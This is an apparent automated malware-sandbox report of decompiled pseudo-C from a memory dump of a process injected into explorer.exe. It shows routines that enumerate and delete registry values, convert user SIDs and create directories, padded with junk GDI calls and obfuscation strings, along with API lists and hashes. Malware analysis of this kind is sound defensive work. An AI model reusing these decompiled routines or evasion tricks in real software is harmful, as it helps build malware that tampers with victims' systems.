										__eflags = 0;
										 *_t88 = 0;
									}
									E00F5B15C(_t102, __eflags, _t116);
								}
							}
						}
						_v20 =  &(_v20->i);
						__eflags = _v20 - _v24;
					} while (_v20 < _v24);
				} else {
					_t91 =  *0xf8974c; // 0x547f890
					 *((intOrPtr*)(_t91 + 0x1c))(_v8);
				}
			}

0x00f51100
0x00f51114
0x00f51123
0x00f51126
0x00f51131
0x00f51138
0x00f5113b
0x00f5113e
0x00f51143
0x00f51146
0x00f5114b
0x00f512d0
0x00f512d4
0x00f512d4
0x00f51158
0x00f5115e
0x00f51163
0x00f512ce
0x00000000
0x00f512ce
0x00f51179
0x00f51181
0x00f51290
0x00f51293
0x00f51298
0x00f5129d
0x00f5129d
0x00f512a5
0x00f512bc
0x00f512c7
0x00000000
0x00f512cd
0x00f511b5
0x00f511c7
0x00f511ca
0x00000000
0x00000000
0x00f511d0
0x00f511d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00f511d9
0x00f511d9
0x00f511de
0x00f511e8
0x00f511ed
0x00f511f0
0x00f511f5
0x00f511f8
0x00f511fb
0x00f51212
0x00f51218
0x00f5121a
0x00f5127b
0x00f5121c
0x00f5121f
0x00f51227
0x00f5122a
0x00f5122d
0x00f5122f
0x00f51237
0x00f5123f
0x00f51245
0x00f51248
0x00f5124a
0x00f51252
0x00f51256
0x00f5125a
0x00f5125c
0x00f5125e
0x00f5125e
0x00f51263
0x00f51263
0x00f51248
0x00f5122f
0x00f51281
0x00f51287
0x00f51287
0x00f511b7
0x00f511ba
0x00f511bf
0x00f511bf

APIs

memset.MSVCRT ref: 00F51126

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,00000000,?,?,00000001), ref: 00F51179
RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 00F511AD
memset.MSVCRT ref: 00F511DE
memset.MSVCRT ref: 00F511E8
RegEnumValueW.ADVAPI32(?,?,?,?,00000000,00000000,?,?), ref: 00F51212
RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000001), ref: 00F51237
IsValidCodePage.KERNEL32(0000001A,?,?,?,?,?,?,?,?,00000001), ref: 00F5123F
BitBlt.GDI32(00000000,0000005A,00000050,00000022,0000001E,00000000,00000027,0000003B,0000002F), ref: 00F512BC

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: memset$Value$AllocateCodeDeleteEnumHeapInfoOpenPageQueryValid
String ID:
API String ID: 685859871-0
Opcode ID: 9e1e212685ddc7c0d2e8a87ac09248ee0e560641038184dab30578b5da912032
Instruction ID: 63a5053920a0811a9257fa6846652829037501411fe2591d0530b914fc3bbf9f
Opcode Fuzzy Hash: 9e1e212685ddc7c0d2e8a87ac09248ee0e560641038184dab30578b5da912032
Instruction Fuzzy Hash: F5511971D0020DBFEB119FA4DC85EEE7BBCFF08311F10406AF605A6191D6709A89AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F5574B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00F5574B(void* __ebx, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v17;
				char _v32;
				char _v64;
				short _v128;
				char _v412;
				char _v648;
				char _v1168;
				void* _t39;
				void* _t41;
				void* _t43;
				struct _SECURITY_ATTRIBUTES* _t45;
				int _t47;
				void* _t51;
				char _t54;
				char* _t56;
				char _t65;
				intOrPtr _t66;
				char* _t70;
				void* _t82;
				void* _t85;
				void* _t86;
				void* _t95;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t99;

				E00F6143F( &_v64, __eflags, __fp0, _a8);
				_t39 = E00F611E9(_a4);
				_pop(_t85);
				if(_t39 == 0) {
					GetLastError();
					_t41 = E00F5ACD6("0Z oysdi3Olt5IFaxHYixAeR3m7s9UX8NKv i.jLLsP5UNib DffXK8y,2Nm nv2mTQAAZ6.JtAF.ROC.Pdnutj81EJL57, dG7k6jZ4g2IVYNC CQhVvXnIMU6JAWpC4UENW k98LKCBh8Wm.zAGPp7bdUmPGtS17z,rWpdU4uZ8R5TNW3yU  ZEqmA3zzPVBvshdFeQ C.OVtq v WteVKX,aJ1wpT7f4 vbBA aDeMMzy4RA VNfafXnS1s  Mizf2dftz6Zz7EywklnNDdEqXyQtEnEP0K810Dy57lswneB80RG12PXnsWp18MMpjH.N,bQ .9x yu");
					_pop(_t86);
					_t95 = 0xf;
					__eflags = _t41 - _t95;
					if(_t41 <= _t95) {
						_t95 = _t41;
					}
					_t82 = 0;
					_v17 = 0;
					__eflags = _t95;
					if(_t95 == 0) {
						L9:
						_t43 = E00F55616(_t86, _a4,  &_v1168, 0x104); // executed
						_t99 = _t98 + 0xc;
						__eflags = _t43;
						if(_t43 == 0) {
							_v8 = E00F55912();
						} else {
							E00F5AE0B(_t86,  &_v648); // executed
							 *_t99 = 0x22d;
							_t54 = E00F58AF1(_t86);
							_push(0);
							_v12 = _t54;
							_push( &_v64);
							_t56 = "\\";
							_push(_t56);
							_push(_v12);
							_push(_t56);
							_push( &_v648);
							_push(_t56);
							_v8 = E00F5B60A( &_v1168);
							E00F5BA86( &_v12);
						}
						L12:
						_t45 = E00F5B081(_v8); // executed
						if(_t45 != 0) {
							L16:
							return _v8;
						}
						_t47 = CreateDirectoryW(_v8, _t45); // executed
						if(_t47 == 0) {
							L15:
							__imp__GetCPInfoExA(9, 0xa,  &_v412);
							E00F5AB81( &_v8, 0xfffffffe);
							goto L16;
						}
						_t51 = E00F5B081(_v8); // executed
						if(_t51 != 0) {
							goto L16;
						}
						goto L15;
					} else {
						do {
							_t16 = _t82 + 0x42; // 0x42
							 *((char*)(_t97 + _t82 - 0x1c)) = _t16;
							MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v128, 0x20);
							_t82 = _t82 + 1;
							__eflags = _t82 - _t95;
						} while (_t82 < _t95);
						goto L9;
					}
				}
				_t65 = E00F58AF1(_t85, 0x4e);
				 *_t98 = 0x104;
				_push( &_v648);
				_v16 = _t65;
				_push(_t65);
				_t66 =  *0xf89740; // 0x547f6c8
				if( *((intOrPtr*)(_t66 + 0xe0))() != 0) {
					_v12 = E00F58AF1( &_v648, 0x22d);
					_push(0);
					_push( &_v64);
					_t70 = "\\";
					_push(_t70);
					_push(_v12);
					_push(_t70);
					_v8 = E00F5B60A( &_v648);
					E00F5BA86( &_v12);
					Arc(0, 0x57, 0x2e, 0x3f, 0x39, 0x44, 0x3b, 0x53, 8);
				} else {
					IsValidCodePage(0x39);
					_v8 = E00F55912();
				}
				E00F5BA86( &_v16);
				goto L12;
			}

0x00f5575b
0x00f55763
0x00f55769
0x00f5576c
0x00f5580c
0x00f55817
0x00f5581c
0x00f5581f
0x00f55820
0x00f55822
0x00f55824
0x00f55824
0x00f55826
0x00f55828
0x00f5582c
0x00f5582e
0x00f55852
0x00f55861
0x00f55866
0x00f5586a
0x00f5586c
0x00f558c3
0x00f5586e
0x00f55875
0x00f5587a
0x00f55881
0x00f55886
0x00f55888
0x00f5588e
0x00f5588f
0x00f55894
0x00f55895
0x00f5589e
0x00f5589f
0x00f558a0
0x00f558ad
0x00f558b4
0x00f558b9
0x00f558c6
0x00f558c9
0x00f558d2
0x00f5590d
0x00f55911
0x00f55911
0x00f558d8
0x00f558e0
0x00f558ef
0x00f558fa
0x00f55906
0x00000000
0x00f5590c
0x00f558e5
0x00f558ed
0x00000000
0x00000000
0x00000000
0x00f55830
0x00f55830
0x00f55832
0x00f55835
0x00f55847
0x00f5584d
0x00f5584e
0x00f5584e
0x00000000
0x00f55830
0x00f5582e
0x00f55774
0x00f55779
0x00f55786
0x00f55787
0x00f5578a
0x00f5578b
0x00f55798
0x00f557b6
0x00f557b9
0x00f557be
0x00f557bf
0x00f557c4
0x00f557c5
0x00f557c8
0x00f557d5
0x00f557dc
0x00f557f6
0x00f5579a
0x00f5579c
0x00f557a7
0x00f557a7
0x00f55800
0x00000000

APIs

IsValidCodePage.KERNEL32(00000039), ref: 00F5579C

Part of subcall function 00F55912: IsValidCodePage.KERNEL32(0000003E,?,?,?,00F558C3), ref: 00F55930

Arc.GDI32(00000000,00000057,0000002E,0000003F,00000039,00000044,0000003B,00000053,00000008), ref: 00F557F6
GetLastError.KERNEL32(00000000,00000000), ref: 00F5580C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F55847
CreateDirectoryW.KERNELBASE(?,00000000), ref: 00F558D8
GetCPInfoExA.KERNEL32(00000009,0000000A,?), ref: 00F558FA

Strings

0Z oysdi3Olt5IFaxHYixAeR3m7s9UX8NKv i.jLLsP5UNib DffXK8y,2Nm nv2mTQAAZ6.JtAF.ROC.Pdnutj81EJL57, dG7k6jZ4g2IVYNC CQhVvXnIMU6JAWpC4UENW k98LKCBh8Wm.zAGPp7bdUmPGtS17z,rWpdU4uZ8R5TNW3yU ZEqmA3zzPVBvshdFeQ C.OVtq v WteVKX,aJ1wpT7f4 vbBA aDeMMzy4RA VNfafXnS1s Mizf, xrefs: 00F55812

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageValid$ByteCharCreateDirectoryErrorInfoLastMultiWide
String ID: 0Z oysdi3Olt5IFaxHYixAeR3m7s9UX8NKv i.jLLsP5UNib DffXK8y,2Nm nv2mTQAAZ6.JtAF.ROC.Pdnutj81EJL57, dG7k6jZ4g2IVYNC CQhVvXnIMU6JAWpC4UENW k98LKCBh8Wm.zAGPp7bdUmPGtS17z,rWpdU4uZ8R5TNW3yU ZEqmA3zzPVBvshdFeQ C.OVtq v WteVKX,aJ1wpT7f4 vbBA aDeMMzy4RA VNfafXnS1s Mizf
API String ID: 1073574028-31605445
Opcode ID: 5d921a61bf502caa6410f0dfd5741aed72cb2c2cd8c5ef02ddea3d5684225408
Instruction ID: 459147707e27aee3c08cb156f7968f69b1897f4cd30175d354acd930c6395e4a
Opcode Fuzzy Hash: 5d921a61bf502caa6410f0dfd5741aed72cb2c2cd8c5ef02ddea3d5684225408
Instruction Fuzzy Hash: 21518371D00209BBEF10ABA4DC96FEE777CEB04752F104165FB05E60D1EB749A88AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F55616, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00F55616(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				int _v16;
				char _v20;
				char _v21;
				char _v36;
				short _v100;
				char* _t29;
				char _t30;
				void* _t31;
				char _t36;
				void* _t42;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				char _t56;
				void* _t57;
				void* _t65;
				void* _t67;

				_t59 = __ecx;
				_v16 = 0;
				_v12 = 0;
				BitBlt(0, 0x2e, 0x1f, 0x23, 1, 0, 0x56, 0x11, 0x57);
				_t29 =  &_v12;
				__imp__ConvertSidToStringSidW(_a4, _t29);
				if(_t29 == 0) {
					return _t29;
				}
				_t30 = E00F58AF1(__ecx, 0x237);
				_push(0);
				_push(_v12);
				_v8 = _t30;
				_push("\\");
				_t31 = E00F5B60A(_t30);
				E00F5BA86( &_v8);
				_v8 = E00F58AF1(_t59, 0x21c);
				ArcTo(0, 0x46, 0x1b, 0x5b, 0x27, 0xa, 0x16, 0x20, 2);
				_t36 = E00F5A73C(_t31, _v8); // executed
				_t56 = _t36;
				_v20 = _t56;
				E00F5BA86( &_v8);
				if(_t56 != 0) {
					_t50 =  *0xf89724; // 0x547f930
					 *((intOrPtr*)(_t50 + 0x1c))(_t56);
					_push(_a12);
					_t52 =  *0xf89740; // 0x547f6c8
					_push(_a8);
					_push(_t56);
					if( *((intOrPtr*)(_t52 + 0xa4))() != 0) {
						_v16 = 1;
					}
				}
				if(_v12 != 0) {
					_t48 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t48 + 0x34))(_v12);
				}
				E00F5AB81( &_v20, 0xfffffffe);
				GetLastError();
				_t42 = E00F5ACD6("vNn2K7.cd4i4mSywn1Mdts4a,q2j74WcCdK o4Qk O3sPVnsOEGg8Fz5m5 o8oS3dbeboErJE6EX4Pxd1vZIsSx8ouP.XCIiDkP9LX 0.G33O97pOVmOHISMJN,fhtGUc KPgqdT,rZJQIQOPUo9mItC5,i8r8lzM773LxUM1BcI9GVR16st zVcH pdeiUkM2Gw9.lJ5C67XQaiJwoMtBja vSj ZixwmZshdlAx,3Mhwg C D477lPtlgDpQQdaL un c6ebcO.2dYCx JA lDlStNXKdjv60iZRZ I3MdvSLZPO.bxcoN2LBUiqVVTXlFTtH5FX");
				_t65 = 0xf;
				if(_t42 <= _t65) {
					_t65 = _t42;
				}
				_t57 = 0;
				_v21 = 0;
				if(_t65 <= 0) {
					L10:
					return _v16;
				} else {
					do {
						_t22 = _t57 + 0x42; // 0x42
						 *((char*)(_t67 + _t57 - 0x20)) = _t22;
						MultiByteToWideChar(0, 0,  &_v36, 0xffffffff,  &_v100, 0x20);
						_t57 = _t57 + 1;
					} while (_t57 < _t65);
					goto L10;
				}
			}

0x00f55616
0x00f55632
0x00f55635
0x00f55638
0x00f5563e
0x00f55645
0x00f5564d
0x00f5574a
0x00f5574a
0x00f55659
0x00f5565e
0x00f5565f
0x00f55662
0x00f55665
0x00f5566b
0x00f55676
0x00f55699
0x00f5569c
0x00f556a6
0x00f556ab
0x00f556b1
0x00f556b4
0x00f556be
0x00f556c0
0x00f556c6
0x00f556c9
0x00f556cc
0x00f556d1
0x00f556d4
0x00f556dd
0x00f556df
0x00f556df
0x00f556dd
0x00f556e5
0x00f556ea
0x00f556ef
0x00f556ef
0x00f556f8
0x00f556ff
0x00f5570a
0x00f55712
0x00f55715
0x00f55717
0x00f55717
0x00f55719
0x00f5571b
0x00f55721
0x00f55743
0x00000000
0x00f55723
0x00f55723
0x00f55725
0x00f55728
0x00f55738
0x00f5573e
0x00f5573f
0x00000000
0x00f55723

APIs

BitBlt.GDI32(00000000,0000002E,0000001F,00000023,00000001,00000000,00000056,00000011,00000057), ref: 00F55638
ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00F55645

Part of subcall function 00F5B60A: lstrcatW.KERNEL32(00000000,00000000), ref: 00F5B64A

ArcTo.GDI32(00000000,00000046,0000001B,0000005B,00000027,0000000A,00000016,00000020,00000002,?,?,?,?,?,?,00000000), ref: 00F5569C

Part of subcall function 00F5A73C: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000104,00000001,?,00F556AB,00000000,00000104), ref: 00F5A760

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00F556FF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,?,?,?,?,?,?,?,?,00000000), ref: 00F55738

Strings

vNn2K7.cd4i4mSywn1Mdts4a,q2j74WcCdK o4Qk O3sPVnsOEGg8Fz5m5 o8oS3dbeboErJE6EX4Pxd1vZIsSx8ouP.XCIiDkP9LX 0.G33O97pOVmOHISMJN,fhtGUc KPgqdT,rZJQIQOPUo9mItC5,i8r8lzM773LxUM1BcI9GVR16st zVcH pdeiUkM2Gw9.lJ5C67XQaiJwoMtBja vSj ZixwmZshdlAx,3Mhwg C D477lPtlgDpQQdaL u, xrefs: 00F55705

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharConvertErrorLastMultiOpenStringWidelstrcat
String ID: vNn2K7.cd4i4mSywn1Mdts4a,q2j74WcCdK o4Qk O3sPVnsOEGg8Fz5m5 o8oS3dbeboErJE6EX4Pxd1vZIsSx8ouP.XCIiDkP9LX 0.G33O97pOVmOHISMJN,fhtGUc KPgqdT,rZJQIQOPUo9mItC5,i8r8lzM773LxUM1BcI9GVR16st zVcH pdeiUkM2Gw9.lJ5C67XQaiJwoMtBja vSj ZixwmZshdlAx,3Mhwg C D477lPtlgDpQQdaL u
API String ID: 2097103513-3958346626
Opcode ID: 930c5c165f4c861ae895259e3a2492b49d5eb40f0a75d820d103bba0e967e05b
Instruction ID: f600cbdef31e76c9d71e541a585b6555f5513b196603fa85399ad8a84d50ee8e
Opcode Fuzzy Hash: 930c5c165f4c861ae895259e3a2492b49d5eb40f0a75d820d103bba0e967e05b
Instruction Fuzzy Hash: 4F31B335A4031CBBDB209FA49C8AFEE7B78FB08B51F100055FB05A61C2DAB48645AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F552E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00F552E5(intOrPtr __edx, void* __eflags) {
				struct HDC__* _v8;
				signed int _v12;
				void* _v24;
				char _v25;
				char _v40;
				short _v108;
				void* __esi;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t39;
				char _t47;
				void* _t51;
				intOrPtr _t54;
				intOrPtr _t56;
				void* _t59;

				_t54 = __edx;
				_t22 =  *0xf89720; // 0xf90000
				_t47 = 0;
				_v8 = 0;
				_t24 = E00F613A3( *((intOrPtr*)(_t22 + 0xac)));
				_v12 = _t24;
				if(_t24 == 0) {
					return _t24 | 0xffffffff;
				}
				_t25 = E00F5AC58(0x80000); // executed
				 *0xf8976c = _t25;
				GetLastError();
				_t27 = E00F5ACD6(" bZemECwMn8eHX");
				_t56 = 0xf;
				__eflags = _t27 - _t56;
				if(_t27 <= _t56) {
					_t56 = _t27;
				}
				_v25 = _t47;
				__eflags = _t56;
				if(_t56 == 0) {
					L6:
					__eflags =  *0xf8976c;
					if( *0xf8976c != 0) {
						_t28 = E00F6123C( &_v24);
						__eflags = _t28;
						if(_t28 < 0) {
							_v24 = 0;
						}
						__eflags = 0 - _v24;
						asm("sbb eax, eax");
						_t31 =  *0xf89740; // 0x547f6c8
						 *0xf89770 =  *((intOrPtr*)(_t31 + 0xd0))(_v12, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v24);
						_t33 = E00F5CEF9(_t54, 0);
						_pop(_t51);
						__eflags = _t54;
						if(__eflags > 0) {
							L14:
							__eflags =  *0xf89770 - 0xffffffff;
							if( *0xf89770 != 0xffffffff) {
								E00F61154(_t51); // executed
								_t35 = E00F5C179(_t51, E00F55473, 0, 0, 0); // executed
								__eflags = _t35;
								if(_t35 == 0) {
									_t39 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t39 + 0x30))( *0xf89770);
									_v8 = 0xfffffffd;
								}
							} else {
								 *0xf89770 = 0;
								_v8 = 0xfffffffe;
							}
							L18:
							E00F5AB81( &_v12, 0xffffffff);
							return _v8;
						}
						if(__eflags < 0) {
							L13:
							CreateEnhMetaFileA(0, "3KQFM5GvRfvzA41jJYhzaVl4XC6sbUHSxtC12dOyASplYqloFqP m 9cNzekHQ10Zc4Ekj4Y7 hKPgoe8gIxZA9XnUm shNWaxgUg649mW7,gCEpiahdDHWeIR5qpR  a4RHKql2jrI,C4phu6d3 JXUabtAk.eVVZBzJA.hUCvU bc,mRD7Ttc8 Gatz.1cZv14GwAom35uyvwyOkDKvT WJZMBFwo29LtMB.Sk rw2hcNTnT70wAvHA4,FG8w2KK jMLz vet.85nsLsy6Li17pwRmrvs fy5bNIigro74rsQPKM0T a7u2K7VqUFx B,9.fC2T D rWI3ERcEWqp67QKm O8IyG3wyx7R0T 37WtdYBfxCH9Yf9PET ,gEkf,,uvzOsacAqTJhdQZ9606elRvWyNY6cD9QXgaIBKYpbw..n XLO kUZUGvT0u34S6zPou,Y6sOfVVAFA9TCEWB5TpPqH81,OwH8HWMyeWd8JuVvtSv9VTeNVOCvvnbWK4JU3NhnMQz9A9g6G0RgBsKH2yXJzfJqhyWwKRfiY,O3gkJ2Oxi42i4bNOQZz08LEJ924abfr8 nlrrI9yZG0SyNx7DZenMQMIEFX hZYOi9M6iJw7z 0CR XKji5hSsVg2cBY4AKOo lQOQxkEtwczHcDvB3IHy5n0CGVT6 FbBY1qvlTcg Xtj xYn57RgFGyeLdeRC h2euv3Z y aFKEGzKxSeiKrBRGX5LugAK17qeMbN9Bu76AbmbIv8LRsXS8BXTW69fdHaKdL51qGEic LPgMNPGQCddb3iJLNhFMSM6FN Nou5nA9W9nhAaEgzKZH8X8qN4CeSu AKeKZdyDp13LC9jF4hdv0Ldr2jAoX6C oJbPxgw3 3erS0w5gMFcz,WAGen7Ir owC7,P3.ZwgBS97DYsm aHoquqKvP,j3W7Q  UUakt1K,ZMc,solcyWQxiNy3 dpAtwdZTh6B8IrtjbOvu.3qd x2FVS1ieV7UlxXM5UyG Z4LNo3tEhQNaR7jLeYmyNxHS8oLWLY623Es.tFKh4eDx,bI.ZP49Rw0aSM5J6Wi1dlqWNN5N2AwlUVAY0TJrDusgEcwX3c0abyZe0rJVeABeqZ6IdZfK,LuJGroEB6nx BVukScnRfT.tu beDfi9248NCq9LWJ9k MncbLkq8tj3p3jjNNuosYI9NMaU2SFeNH 59VJTTgqpmQu6oGOiZvPLzjOwo4J7sl2vhzY3vN,rCG8BnDKEiLiTksj62prK0P8 KtPy,kR O8Ri5I8L RdDlMG ksxUqsoYKGCEzRynByuKJ,9h.TsLe kwqN7HWQWm6x 0E D3rlnrXK180bGVDUISMbLr3bhC0Vx zlbrYUgdRSV8", 0, 0);
							goto L14;
						}
						__eflags = _t33 - 0x2bcf;
						if(_t33 >= 0x2bcf) {
							goto L14;
						}
						goto L13;
					}
					_v8 = 0xfffffff5;
					goto L18;
				} else {
					do {
						_t5 = _t47 + 0x42; // 0x42
						 *((char*)(_t59 + _t47 - 0x24)) = _t5;
						MultiByteToWideChar(0, 0,  &_v40, 0xffffffff,  &_v108, 0x20);
						_t47 = _t47 + 1;
						__eflags = _t47 - _t56;
					} while (_t47 < _t56);
					goto L6;
				}
			}

0x00f552e5
0x00f552eb
0x00f552f8
0x00f552fb
0x00f552fe
0x00f55303
0x00f55308
0x00000000
0x00f5530a
0x00f55318
0x00f5531e
0x00f55323
0x00f5532e
0x00f55336
0x00f55337
0x00f55339
0x00f5533b
0x00f5533b
0x00f5533d
0x00f55340
0x00f55342
0x00f55366
0x00f55366
0x00f5536d
0x00f5537e
0x00f55385
0x00f55387
0x00f55389
0x00f55389
0x00f5538e
0x00f55394
0x00f55399
0x00f553b7
0x00f553bc
0x00f553c1
0x00f553c2
0x00f553c4
0x00f553dd
0x00f553dd
0x00f553e4
0x00f553f5
0x00f55402
0x00f5540a
0x00f5540c
0x00f55414
0x00f55419
0x00f5541c
0x00f5541c
0x00f553e6
0x00f553e6
0x00f553ec
0x00f553ec
0x00f55423
0x00f55429
0x00000000
0x00f55432
0x00f553c6
0x00f553cf
0x00f553d7
0x00000000
0x00f553d7
0x00f553c8
0x00f553cd
0x00000000
0x00000000
0x00000000
0x00f553cd
0x00f5536f
0x00000000
0x00f55344
0x00f55344
0x00f55346
0x00f55349
0x00f5535b
0x00f55361
0x00f55362
0x00f55362
0x00000000
0x00f55344

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 00F55323
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F5535B

Strings

bZemECwMn8eHX, xrefs: 00F55329
3KQFM5GvRfvzA41jJYhzaVl4XC6sbUHSxtC12dOyASplYqloFqP m 9cNzekHQ10Zc4Ekj4Y7 hKPgoe8gIxZA9XnUm shNWaxgUg649mW7,gCEpiahdDHWeIR5qpR a4RHKql2jrI,C4phu6d3 JXUabtAk.eVVZBzJA.hUCvU bc,mRD7Ttc8 Gatz.1cZv14GwAom35uyvwyOkDKvT WJZMBFwo29LtMB.Sk rw2hcNTnT70wAvHA4,FG8w2KK j, xrefs: 00F553D1

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: bZemECwMn8eHX$3KQFM5GvRfvzA41jJYhzaVl4XC6sbUHSxtC12dOyASplYqloFqP m 9cNzekHQ10Zc4Ekj4Y7 hKPgoe8gIxZA9XnUm shNWaxgUg649mW7,gCEpiahdDHWeIR5qpR a4RHKql2jrI,C4phu6d3 JXUabtAk.eVVZBzJA.hUCvU bc,mRD7Ttc8 Gatz.1cZv14GwAom35uyvwyOkDKvT WJZMBFwo29LtMB.Sk rw2hcNTnT70wAvHA4,FG8w2KK j
API String ID: 203985260-1096848061
Opcode ID: 11fcdbad6d90a7ac067b15a2e87292073ed280c5524fd30285155e41362f703f
Instruction ID: 7d4f4e11882b23673721bea487eb0a937a4cd73875caea08a906b9dfbab14c76
Opcode Fuzzy Hash: 11fcdbad6d90a7ac067b15a2e87292073ed280c5524fd30285155e41362f703f
Instruction Fuzzy Hash: FC312831914618AFDB10DFA49C45AAE3B78FB01B61F240225FA15D61D1D7B08949E791

Uniqueness

Uniqueness Score: -1.00%

Function 00F55133, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F55133(void* __eflags) {
				struct HINSTANCE__* _v8;
				struct _WNDCLASSEXA _v56;
				char _v84;
				char _v148;
				void* __edi;
				intOrPtr _t26;
				intOrPtr _t30;
				struct HWND__* _t40;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				struct HWND__* _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				CHAR* _t62;
				struct HINSTANCE__* _t63;

				_t26 =  *0xf89740; // 0x547f6c8
				_v8 =  *((intOrPtr*)(_t26 + 0x10))(0);
				memset( &_v56, 0, 0x30);
				_t30 =  *0xf89720; // 0xf90000
				_t62 =  &_v148;
				E00F5B4BE(_t62, 1, 0x1e, 0x32, _t30 + 0x648);
				_t63 = _v8;
				_v56.lpszClassName = _t62;
				_v56.style = 3;
				_v56.cbSize = 0x30;
				_v56.lpfnWndProc = E00F55266;
				_v56.hInstance = _t63;
				if(RegisterClassExA( &_v56) != 0) {
					_t40 = CreateWindowExA(0,  &_v148,  &_v148, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t63, 0);
					 *0xf89768 = _t40;
					if(_t40 == 0) {
						L9:
						_t42 =  *0xf89728; // 0x547f820
						 *((intOrPtr*)(_t42 + 0x2c))( &_v148, _t63);
						return 0;
					}
					_t45 =  *0xf89728; // 0x547f820, executed
					 *((intOrPtr*)(_t45 + 0x14))(_t40, 0);
					_t47 =  *0xf89728; // 0x547f820
					 *((intOrPtr*)(_t47 + 0x18))( *0xf89768);
					while(1) {
						_t50 =  *0xf89728; // 0x547f820
						_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v84, 0, 0, 0);
						if(_t51 == 0) {
							break;
						}
						if(_t51 == 0xffffffff) {
							break;
						}
						_t56 =  *0xf89728; // 0x547f820
						 *((intOrPtr*)(_t56 + 0x20))( &_v84);
						_t59 =  *0xf89728; // 0x547f820
						 *((intOrPtr*)(_t59 + 0x24))( &_v84);
					}
					L7:
					_t52 =  *0xf89768; // 0x50440
					if(_t52 != 0) {
						_t53 =  *0xf89728; // 0x547f820
						 *((intOrPtr*)(_t53 + 0x28))(_t52);
					}
					goto L9;
				}
				ArcTo(0, 0x37, 0x2b, 0x13, 0x55, 0x2f, 0x30, 0x1a, 0x26);
				goto L7;
			}

0x00f5513c
0x00f5514b
0x00f55153
0x00f55158
0x00f55169
0x00f5516f
0x00f55176
0x00f55179
0x00f55188
0x00f5518f
0x00f55196
0x00f5519d
0x00f551a6
0x00f551e6
0x00f551e9
0x00f551f0
0x00f5524e
0x00f55256
0x00f5525b
0x00f55263
0x00f55263
0x00f551f4
0x00f551f9
0x00f55202
0x00f55207
0x00f55229
0x00f55230
0x00f55235
0x00f5523a
0x00000000
0x00000000
0x00f5520f
0x00000000
0x00000000
0x00f55215
0x00f5521a
0x00f55221
0x00f55226
0x00f55226
0x00f5523c
0x00f5523c
0x00f55243
0x00f55246
0x00f5524b
0x00f5524b
0x00000000
0x00f55243
0x00f551b9
0x00000000

APIs

memset.MSVCRT ref: 00F55153
RegisterClassExA.USER32(?), ref: 00F551A0
ArcTo.GDI32(00000000,00000037,0000002B,00000013,00000055,0000002F,00000030,0000001A,00000026), ref: 00F551B9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,?,00000000), ref: 00F551E6

Strings

0, xrefs: 00F5518F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

